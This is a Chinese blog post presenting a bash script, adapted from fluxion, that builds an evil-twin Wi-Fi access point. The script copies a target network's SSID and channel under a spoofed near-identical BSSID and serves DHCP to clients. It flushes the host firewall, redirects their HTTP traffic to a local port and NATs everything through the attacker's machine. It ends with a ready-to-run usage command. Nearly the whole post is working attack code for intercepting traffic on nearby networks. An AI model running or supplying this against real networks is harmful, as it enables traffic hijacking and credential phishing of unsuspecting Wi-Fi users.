前言
最近在研究WIFI流量劫持的相关工具,由于技术栈太浅,过程颇为痛苦😖,还是太菜了,有一部分是伪造wifi的过程,简化下放出来,基于fluxion工具修改的,需要有一个无线网卡,可以在某宝上花几十元买个
安装依赖
apt update && apt install -y hostapd isc-dhcp-server
hostapd 用来建立wifi热点, isc-dhcp-server 用来给连上伪造wifi的客户端分配ip和配置dns服务
代码
#!/usr/bin/env bash
# Rogue access point script (adapted from fluxion): brings up a hostapd AP that
# copies a target network's SSID/channel under a near-identical BSSID, hands out
# addresses over DHCP, and NATs client traffic through this host. Everything
# below changes root-owned network state (iptables, sysctls, interface MAC);
# see stop_attack / captive_portal_unset_routes for what is and is not undone.
OutputDevice=/dev/null # sink for noisy tool output (`&> $OutputDevice`)
APServiceInterface="" # interface hostapd serves the wifi on
CaptivePortalAccessInterface="" # interface that receives the gateway address (re-set from APServiceAccessInterface)
CaptivePortalAccessPointInterface="" # interface handed to ap_service_prep
# All three interface variables are set to the same -i/--interface value below.
CaptivePortalGatewayAddress="192.169.254.1" # gateway address of the rogue network
# NOTE(review): 192.169.0.0/16 is publicly routable address space, not RFC 1918
# private space (192.168.0.0/16 is); presumably 192.168.254.1 was intended — confirm.
TargetMAC="" # BSSID of the wifi being imitated, expected as xx:xx:xx:xx:xx:xx (sliced by character offset in captive_portal_set_attack)
TargetSSID="" # wifi name
TargetChannel="" # wifi channel
Wifipassword="" # WPA2 passphrase; written in plain text into tmp/<mac>-hostapd.conf
CaptivePortalGatewayNetwork=${CaptivePortalGatewayAddress%.*} # first three octets of the gateway address; the /24 dhcpd hands out
IPTablesBackup="tmp/iptables-rules" # iptables-save dump taken in start_attack; captive_portal_unset_routes restores it when still present
# Parse command-line arguments (util-linux enhanced getopt: short -e -m -c -p -i,
# long --essid --mac --channel --password --interface).
ARGS=`getopt -o e:m:c:p:i: --long essid:,mac:,channel:,password:,interface: -- "$@"`
if [ $? != 0 ] ; then echo "Terminating..." >&2 ; exit 1 ; fi
eval set -- "$ARGS" # replace the positional parameters with getopt's normalized output
while true;do
case "$1" in
-i|--interface)
# One physical interface plays every role.
APServiceInterface=$2
CaptivePortalAccessInterface=$2
CaptivePortalAccessPointInterface=$2
shift 2
;;
-e|--essid)
TargetSSID=$2
shift 2
;;
-m|--mc)
# NOTE(review): getopt above declares the long form as --mac, so "--mac X"
# falls through to the "unknown option" arm below; only -m reaches this arm.
TargetMAC=$2
shift 2
;;
-c|--channel)
TargetChannel=$2
shift 2
;;
-p|--password)
Wifipassword=$2
shift 2
;;
--)
shift
break
;;
*)
echo "未知的参数选项:{$1}"
exit 1
;;
esac
done
# On Ctrl-C, tear the rogue AP down and restore the host (stop_attack).
# Only SIGINT is trapped: SIGTERM or any other unexpected exit leaves the
# iptables/sysctl/interface changes in place.
trap 'stop_attack' SIGINT
# 开启ap服务前的一些配置工作,写入hostapd配置文件
ap_service_prep() {
# Write the hostapd config and spoof the interface MAC before the AP starts.
# Arguments: $1 interface, $2 gateway address, $3 SSID, $4 BSSID to present,
#            $5 channel. Returns 1 when fewer than 5 arguments are given.
# Sets globals APServiceInterface, APServiceInterfaceAddress, APServiceSSID,
# APServiceMAC, APServiceChannel, APServiceAccessInterface; reads Wifipassword,
# OutputDevice, APServicePID.
if [ ${#@} -lt 5 ]; then return 1; fi
APServiceInterface=$1
APServiceInterfaceAddress=$2 # assigned but not referenced anywhere in this script
APServiceSSID=$3
APServiceMAC=$4
APServiceChannel=$5
# NOTE(review): APServicePID is never assigned in this script, so this kill
# runs with an empty argument and its error output is discarded.
kill $APServicePID &> $OutputDevice
# Prepare the hostapd config file.
# WPA2-PSK with the passphrase from Wifipassword (TKIP offered for WPA,
# CCMP for RSN/WPA2); macaddr_acl=0 accepts any station not explicitly
# denied, ignore_broadcast_ssid=0 broadcasts the SSID. The file is written in
# plain text under tmp/ and removed by stop_attack.
echo "\
interface=$APServiceInterface
driver=nl80211
ssid=$APServiceSSID
hw_mode=g
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=$Wifipassword
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
rsn_pairwise=CCMP
channel=$APServiceChannel" \
> "tmp/$APServiceMAC-hostapd.conf"
# Spoof virtual interface MAC address.
# Down -> macchanger -> up, with fixed sleeps between steps (order matters).
# The original MAC is not recorded and nothing in this script restores it.
# From a defender's view, a wireless IDS that tracks SSID->BSSID pairs will
# presumably see a second BSSID appear for the target SSID at this point.
ip link set $APServiceInterface down
sleep 0.5
macchanger --mac=$APServiceMAC $APServiceInterface &> $OutputDevice
sleep 0.5
ip link set $APServiceInterface up
sleep 0.5
# HostAPD sets the virtual interface mode
# to master, which is supported by dhcpd.
APServiceAccessInterface=$APServiceInterface
}
# 设置攻击选项,写入dhcp配置文件
captive_portal_set_attack() {
# Derive the rogue BSSID, prepare the AP (ap_service_prep) and write the
# dhcpd config for the rogue /24.
# Reads TargetMAC, TargetSSID, TargetChannel, CaptivePortalAccessPointInterface,
# CaptivePortalGatewayAddress, CaptivePortalGatewayNetwork; sets TargetRogueMAC
# and CaptivePortalAccessInterface; writes tmp/dhcpd.conf and tmp/dhcpd.leases.
# Rogue BSSID: take the hex digit at offset 13 of TargetMAC (second digit of
# the fifth octet in xx:xx:xx:xx:xx:xx form), add 1, and splice its low nibble
# back in, so the presented BSSID differs from the target's by one hex digit
# (F wraps to 0). The 17-character colon form is assumed; offsets are not
# validated.
local -r rogueMACHex=$(printf %02X $((0x${TargetMAC:13:1} + 1)))
TargetRogueMAC="${TargetMAC::13}${rogueMACHex:1:1}${TargetMAC:14:4}"
ap_service_prep \
"$CaptivePortalAccessPointInterface" \
"$CaptivePortalGatewayAddress" \
"$TargetSSID" \
"$TargetRogueMAC" \
"$TargetChannel"
# ap_service_prep's return status (1 on too few arguments) is not checked.
CaptivePortalAccessInterface=$APServiceAccessInterface
# Generate the dhcpd configuration file, which is
# used to provide DHCP service to rogue AP clients.
# Clients get <network>.100-.254 with the gateway as router and as first DNS
# server, followed by two public resolvers. NOTE(review): nothing in this
# script starts a resolver on the gateway address, so lookups presumably fall
# through to 8.8.8.8 / 114.114.114.114 — confirm.
echo "\
authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet $CaptivePortalGatewayNetwork.0 netmask 255.255.255.0 {
option broadcast-address $CaptivePortalGatewayNetwork.255;
option routers $CaptivePortalGatewayAddress;
option subnet-mask 255.255.255.0;
option domain-name-servers $CaptivePortalGatewayAddress,8.8.8.8,114.114.114.114;
range $CaptivePortalGatewayNetwork.100 $CaptivePortalGatewayNetwork.254;
}\
" >"tmp/dhcpd.conf"
# create an empty leases file
touch "tmp/dhcpd.leases"
}
# 恢复原有的iptables规则
captive_portal_unset_routes() {
# Undo captive_portal_set_routes: restore iptables, the forwarding sysctls,
# and remove the gateway address from the interface.
# Reads IPTablesBackup, OutputDevice, CaptivePortalGatewayAddress,
# CaptivePortalAccessInterface.
if [ -f "$IPTablesBackup" ]; then
# Put back the exact rule set saved by start_attack. This only happens if the
# backup file still exists when this runs — callers must restore before
# cleaning tmp/.
iptables-restore <"$IPTablesBackup" \
&> $OutputDevice
else
# No backup: wipe everything instead. This does NOT bring back the rules the
# host had before, and --flush leaves chain policies alone, so the
# "FORWARD ACCEPT" policy set in captive_portal_set_routes stays in effect.
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
fi
# Restore system's original forwarding state
# (values copied from /proc by captive_portal_set_routes).
if [ -f "tmp/ip_forward" ]; then
sysctl -w net.ipv4.ip_forward=$(
cat "tmp/ip_forward"
) &> $OutputDevice
rm -rf "tmp/ip_forward"
fi
if [ -f "tmp/send_redirects" ]; then
sysctl -w net.ipv4.conf.all.send_redirects=$(
cat "tmp/send_redirects"
) &> $OutputDevice
rm -rf "tmp/send_redirects"
fi
# Errors (e.g. the address is already gone) are silenced.
ip addr del $CaptivePortalGatewayAddress/24 dev $CaptivePortalAccessInterface 2>/dev/null
}
# 设置iptables规则,当客户端连上伪造的wifi后,iptables把无线网卡的流量转发到本机上,以使客户端能正常上网
captive_portal_set_routes() {
# Turn this host into the rogue network's gateway: address the interface,
# enable forwarding, replace the firewall with a NAT rule set.
# Reads CaptivePortalGatewayAddress, CaptivePortalAccessInterface,
# CaptivePortalGatewayNetwork, OutputDevice. Side effects: writes
# tmp/ip_forward and tmp/send_redirects, changes two sysctls, flushes every
# rule and user chain in the filter and nat tables.
# Give an address to the gateway interface in the rogue network.
# This makes the interface accessible from the rogue network.
ip addr add $CaptivePortalGatewayAddress/24 dev $CaptivePortalAccessInterface
# Save the system's routing state to restore later.
cp "/proc/sys/net/ipv4/ip_forward" "tmp/ip_forward"
cp "/proc/sys/net/ipv4/conf/all/send_redirects" "tmp/send_redirects"
# Activate system IPV4 packet routing/forwarding.
sysctl -w net.ipv4.ip_forward=1 &>$OutputDevice
sysctl -w net.ipv4.conf.all.send_redirects=0 &>$OutputDevice
# Whatever firewall the host had is discarded here (start_attack saves a copy
# with iptables-save beforehand); chain default policies are not flushed.
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
# Plain HTTP from the rogue /24 is redirected to local port 8080.
# NOTE(review): nothing in this script listens on 8080 (fluxion's captive
# portal presumably does); without a listener those connections are refused.
iptables -t nat -A PREROUTING -s $CaptivePortalGatewayNetwork/24 -p tcp --dport 80 -j REDIRECT --to-port 8080
# All forwarded traffic leaves with this host's address as source, so the
# upstream network sees every client as this host.
iptables -t nat -A POSTROUTING -j MASQUERADE
}
# 停止攻击
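stop_attack() {
  # Tear down what start_attack set up and put the host back.
  # Reads APServiceMAC, OutputDevice; calls captive_portal_unset_routes.
  # Routes/firewall/sysctls are restored FIRST, while tmp/iptables-rules still
  # exists: captive_portal_unset_routes only does a real iptables-restore when
  # that backup is present, otherwise it falls back to flushing every table,
  # which would leave the host without its original firewall after the run.
  captive_portal_unset_routes
  # Per-run state files under tmp/; "--" guards against a value starting with '-'.
  rm -rf -- "tmp/clients.txt"
  rm -rf -- "tmp/hosts"
  rm -rf -- "tmp/iptables-rules"
  rm -rf -- "tmp/dhcpd.leases"
  rm -rf -- "tmp/dhcpd.leases~"
  rm -rf -- "tmp/dhcpd.conf"
  rm -rf -- "tmp/$APServiceMAC-hostapd.conf"
  # killall hits every xterm and hostapd on the system, not only the ones
  # started by start_attack; dhcpd is presumably taken down with its xterm.
  # The spoofed interface MAC is not restored by anything in this script.
  killall xterm &> "$OutputDevice"
  killall hostapd &> "$OutputDevice"
}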
# 开始攻击
start_attack() {
# Bring the rogue AP up: prepare configs, start hostapd and dhcpd in xterms,
# install the NAT routes. The working directory must be writable; all state
# goes under ./tmp.
# NOTE(review): `mkdir tmp` has no -p, so a leftover tmp/ from an earlier run
# makes it fail (ignored — set -e is not in effect) and stale files are reused.
mkdir tmp
rfkill unblock all # lift any soft rfkill block on wireless devices
captive_portal_set_attack
echo '设置攻击完毕'
sleep 2
# Snapshot the current firewall BEFORE captive_portal_set_routes flushes it;
# captive_portal_unset_routes restores from this file.
iptables-save >"$IPTablesBackup"
# hostapd runs in its own xterm, in the background.
xterm -bg "#000000" -fg "#FFFFFF" \
-title " AP Service [hostapd]" -e \
hostapd "tmp/$APServiceMAC-hostapd.conf" &
echo '开启ap服务完毕'
sleep 2
# Backgrounded; the fixed 2 s sleeps are the only ordering between these steps.
captive_portal_set_routes &
echo '设置路由完毕'
sleep 2
# dhcpd in the foreground (-f) with debug output (-d), using the leases and
# config files written above; its output is appended to tmp/clients.txt.
xterm -bg black -fg "#CCCC00" \
-title " AP DHCP Service" -e \
"dhcpd -d -f -lf \"tmp/dhcpd.leases\" -cf \"tmp/dhcpd.conf\" $CaptivePortalAccessInterface 2>&1 | tee -a \"tmp/clients.txt\"" &
}
start_attack
# Keep the script alive until Ctrl-C: the SIGINT trap runs stop_attack,
# which interrupts this wait.
sleep infinity &
wait
使用
./wifi.sh -i 'wlan0' -e 'test' -p 'test123456' -c '10' -m '05:D2:B4:31:A7:28'
大功告成